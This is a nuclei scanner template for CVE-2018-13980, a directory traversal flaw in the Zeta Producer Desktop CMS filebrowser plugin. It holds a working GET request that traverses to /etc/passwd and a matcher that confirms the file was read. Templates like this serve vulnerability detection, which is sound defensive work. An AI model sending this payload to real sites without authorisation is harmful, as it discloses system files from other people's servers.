nuclei-templates/cves/2018/CVE-2018-13980.yaml

33 lines
1008 B
YAML

id: CVE-2018-13980
info:
name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure
author: wisnupramoedya
severity: medium
description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
reference:
- https://www.exploit-db.com/exploits/45016
- https://nvd.nist.gov/vuln/detail/CVE-2018-13980
tags: cve,cve2018,lfi
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.50
cve-id: CVE-2018-13980
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200